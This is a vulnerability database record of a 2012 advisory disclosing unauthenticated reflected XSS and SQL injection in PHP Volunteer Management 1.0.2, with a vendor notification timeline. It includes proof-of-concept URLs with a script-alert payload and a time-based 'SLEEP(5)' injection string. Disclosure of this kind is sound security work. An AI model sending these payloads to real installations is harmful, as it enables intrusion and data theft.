{"id": "SECURITYVULNS:DOC:28028", "bulletinFamily": "software", "title": "PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities", "description": "# Exploit Title: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities\r\n# Date: 04/21/12\r\n# Author: G13\r\n# Twitter: @g13net\r\n# Software Site: https://sourceforge.net/projects/phpvolunteer/\r\n# Version: 1.0.2\r\n# Category: webapp (php)\r\n#\r\n\r\n##### ToC #####\r\n\r\n0x01 Description\r\n0x02 XSS\r\n0x03 SQL Injection\r\n0x04 Vendor Notification\r\n\r\n##### 0x01 Description #####\r\n\r\nThis is a PHP Volunteer Management software. Keep track of Volunteer\r\nhours worked and location assignments. This system is built on\r\nPHP/MySql.\r\n\r\n##### 0x02 XSS #####\r\n\r\n---------------Vulnerability-------------------\r\n\r\nThe 'id' parameter on the get_hours.php page is vulnerable to XSS. No\r\nauthentication is needed. This is a reflective XSS vulnerability.\r\n\r\n----------Exploit-----------------------------------\r\n\r\nhttp://localhost/mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10\r\n\r\n------------PoC---------------------------\r\n\r\nhttp://localhost/mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10\r\n\r\n##### 0x03 SQL Injection #####\r\n\r\n---------------Vulnerability-------------------\r\n\r\nThe 'id' parameter on the get_hours.php page is also vulnerable to SQL\r\nInjection. No authentication is needed.\r\n\r\n----------Exploit-----------------------------------\r\n\r\nhttp://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10\r\n\r\n------------PoC---------------------------\r\n\r\nhttp://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10\r\n\r\n##### 0x04 Vendor Notification #####\r\n\r\n4/21/12 - Vendor Notified\r\n4/24/12 - Vendor reponded, OK to Disclose\r\n", "published": "2012-05-01T00:00:00", "modified": "2012-05-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28028", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:44", "edition": 1, "viewCount": 11, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12352"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 2.1}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645352600}}

{}